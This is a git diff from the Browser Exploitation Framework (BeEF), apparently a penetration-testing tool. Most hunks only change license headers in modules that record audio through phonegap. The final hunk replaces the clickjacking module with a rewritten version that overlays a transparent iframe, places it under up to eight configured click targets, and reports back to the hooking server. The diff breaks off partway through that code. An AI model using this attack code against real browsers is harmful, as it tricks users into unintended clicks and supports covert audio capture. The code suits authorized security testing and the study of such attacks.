@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // exploit phonegap // beef.execute(function() { diff --git a/modules/phonegap/phonegap_start_record_audio/config.yaml b/modules/phonegap/phonegap_start_record_audio/config.yaml index 28e228adc..498874ada 100644 --- a/modules/phonegap/phonegap_start_record_audio/config.yaml +++ b/modules/phonegap/phonegap_start_record_audio/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # 
diff --git a/modules/phonegap/phonegap_start_record_audio/module.rb b/modules/phonegap/phonegap_start_record_audio/module.rb index 1a24663cb..7e8f6ebe3 100644 --- a/modules/phonegap/phonegap_start_record_audio/module.rb +++ b/modules/phonegap/phonegap_start_record_audio/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_stop_record_audio/command.js b/modules/phonegap/phonegap_stop_record_audio/command.js index 0463a023c..72dd96b18 100644 --- a/modules/phonegap/phonegap_stop_record_audio/command.js +++ b/modules/phonegap/phonegap_stop_record_audio/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // exploit phonegap // beef.execute(function() { diff --git a/modules/phonegap/phonegap_stop_record_audio/config.yaml b/modules/phonegap/phonegap_stop_record_audio/config.yaml index 5737fa722..2a78f4779 100644 --- a/modules/phonegap/phonegap_stop_record_audio/config.yaml +++ b/modules/phonegap/phonegap_stop_record_audio/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # 
diff --git a/modules/phonegap/phonegap_stop_record_audio/module.rb b/modules/phonegap/phonegap_stop_record_audio/module.rb index f1022c7f2..974b18bdf 100644 --- a/modules/phonegap/phonegap_stop_record_audio/module.rb +++ b/modules/phonegap/phonegap_stop_record_audio/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js index 70985c019..522102be3 100644 --- a/modules/social_engineering/clickjacking/command.js +++ b/modules/social_engineering/clickjacking/command.js 
@@ -1,92 +1,139 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { - - var offset_top = "<%= @offset_top %>"; - var offset_left = "<%= @offset_left %>"; - var url = "<%= @url %>"; - var debug = <%= @debug %>; - - if (debug) opacity = 10; else opacity = 0; - - // create container - var cjcontainer = document.createElement('div'); - cjcontainer.id = "cjcontainer"; - cjcontainer.setAttribute("style", "-moz-opacity:"+opacity); - cjcontainer.style.zIndex = 999; - cjcontainer.style.border = "none"; - cjcontainer.style.width = "30px"; - cjcontainer.style.height = "20px"; - cjcontainer.style.overflow = "hidden"; - cjcontainer.style.position = "absolute"; - cjcontainer.style.opacity = opacity; - cjcontainer.style.filter = "alpha(opacity="+opacity+")"; - cjcontainer.style.cursor = "default"; - document.body.appendChild(cjcontainer); - - // create iframe - var cjiframe = document.createElement('iframe'); - cjiframe.id = "cjiframe"; - cjiframe.src = url; - cjiframe.scrolling = "no"; - cjiframe.frameBorder = "0"; - cjiframe.allowTransparency = "true"; - cjiframe.style.overflow = "hidden"; - cjiframe.style.position = "absolute"; - cjiframe.style.top = offset_top+"px"; - cjiframe.style.left = 
offset_left+"px"; - cjiframe.style.width = "200px"; - cjiframe.style.height = "100px"; - cjiframe.style.border = "none"; - cjiframe.style.cursor = "default"; - cjcontainer.appendChild(cjiframe); - - // followmouse code by rsnake - // http://ha.ckers.org/weird/followmouse.html - // modified by bcoles - function followmouse(e){ - - var xcoord = 0; - var ycoord = 0; - var gettrailobj = function() { - if (document.getElementById) - return document.getElementById("cjcontainer").style; - else if (document.all) - return document.all.container.style; - } - if (typeof e != "undefined") { - xcoord += e.pageX - 10; - ycoord += e.pageY - 15; - } else if (typeof window.event != "undefined") { - xcoord += document.body.scrollLeft + event.clientX; - ycoord += document.body.scrollTop + event.clientY; - } - var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15; - var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight) - gettrailobj().left = xcoord + "px"; - gettrailobj().top = ycoord + "px"; + var elems = { + outerFrame: "cjFrame", + innerFrame: "innerFrame", + btn: "persistentFocusBtn" } - // hook to mousemove event - if (window.addEventListener) { - window.addEventListener('mousemove', followmouse, false); - } else if (window.attachEvent) { - window.attachEvent('mousemove', followmouse); + var clicked = 0; + var src = "<%= @iFrameSrc %>"; + var secZone = "<%= @iFrameSecurityZone %>"; + var sandbox = "<%= @iFrameSandbox %>"; + var visibility = "<%= @iFrameVisibility %>"; + + var clicks = [ + {js:"<%= URI.escape(@clickaction_1) %>", posTop:cleanPos("<%= @iFrameTop_1 %>"), posLeft:cleanPos("<%= @iFrameLeft_1 %>")}, + {js:"<%= URI.escape(@clickaction_2) %>", posTop:cleanPos("<%= @iFrameTop_2 %>"), posLeft:cleanPos("<%= @iFrameLeft_2 %>")}, + {js:"<%= URI.escape(@clickaction_3) %>", posTop:cleanPos("<%= @iFrameTop_3 %>"), 
posLeft:cleanPos("<%= @iFrameLeft_3 %>")}, + {js:"<%= URI.escape(@clickaction_4) %>", posTop:cleanPos("<%= @iFrameTop_4 %>"), posLeft:cleanPos("<%= @iFrameLeft_4 %>")}, + {js:"<%= URI.escape(@clickaction_5) %>", posTop:cleanPos("<%= @iFrameTop_5 %>"), posLeft:cleanPos("<%= @iFrameLeft_5 %>")}, + {js:"<%= URI.escape(@clickaction_6) %>", posTop:cleanPos("<%= @iFrameTop_6 %>"), posLeft:cleanPos("<%= @iFrameLeft_6 %>")}, + {js:"<%= URI.escape(@clickaction_7) %>", posTop:cleanPos("<%= @iFrameTop_7 %>"), posLeft:cleanPos("<%= @iFrameLeft_7 %>")}, + {js:"<%= URI.escape(@clickaction_8) %>", posTop:cleanPos("<%= @iFrameTop_8 %>"), posLeft:cleanPos("<%= @iFrameLeft_8 %>")}, + {js:"void(0);", posTop:'-', posLeft:'-'} + ] + + var iframeAttrs = {}; + iframeAttrs.src = src; + (secZone == "on") ? iframeAttrs.security = "restricted" : ""; + (sandbox == "on") ? iframeAttrs.sandbox = "allow-forms" : ""; + + var iframeStyles = {}; + iframeStyles.width = "<%= @iFrameWidth %>px"; + iframeStyles.height = "<%= @iFrameHeight %>px"; + iframeStyles.opacity = (visibility == "on") ? "0.6" : "0.0"; + iframeStyles.filter = (visibility == "on") ? 
"alpha(opacity=60)" : "alpha(opacity=0)"; + + var innerPos = {}; + //initialize iframe + innerPos.top = clicks[0].posTop + "px"; + innerPos.left = clicks[0].posLeft + "px"; + + //returns a negative version of a number, or if NaN returns a dash + function cleanPos(coordinate) { + var iCoordinate = parseInt(coordinate); + if (isNaN(iCoordinate)) + return "-"; + else if (iCoordinate > 0) + return (-1 * iCoordinate) + return iCoordinate } - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event'); + function init(params, styles, stylesInner, callback) { + var container = $j.extend(true, {'border':'none', 'position':'absolute', 'z-index':'100000', 'overflow':'hidden'}, styles); + var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner); + var containerDiv = $j('
').css(container).prependTo('body'); + var containerDiv = $j('').appendTo('body'); + + var innerIframe = $j('